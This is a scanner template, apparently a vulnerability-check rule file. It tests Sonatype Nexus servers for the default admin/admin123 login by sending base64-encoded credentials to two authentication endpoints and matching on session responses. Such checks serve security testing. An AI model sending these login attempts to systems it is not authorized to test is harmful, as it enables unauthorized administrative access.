id: nexus-default-password

info:
    name: Nexus Default Password
    author: Soveless(https://github.com/Soveless)
    severity: high

rules:
    r0:
        request:
            method: GET
            path: /service/local/authentication/login
            headers:
                Accept: application/json
                Authorization: Basic YWRtaW46YWRtaW4xMjM=
        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"loggedIn")
    r1:
        request:
            method: POST
            path: /service/rapture/session
            headers:
                X-Nexus-UI: true
            body: username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
        expression: |
            response.status == 204 && response.raw_header.bcontains(b'Server: Nexus') && response.raw_header.bcontains(b'NXSESSIONID')
expression: r0() || r1()

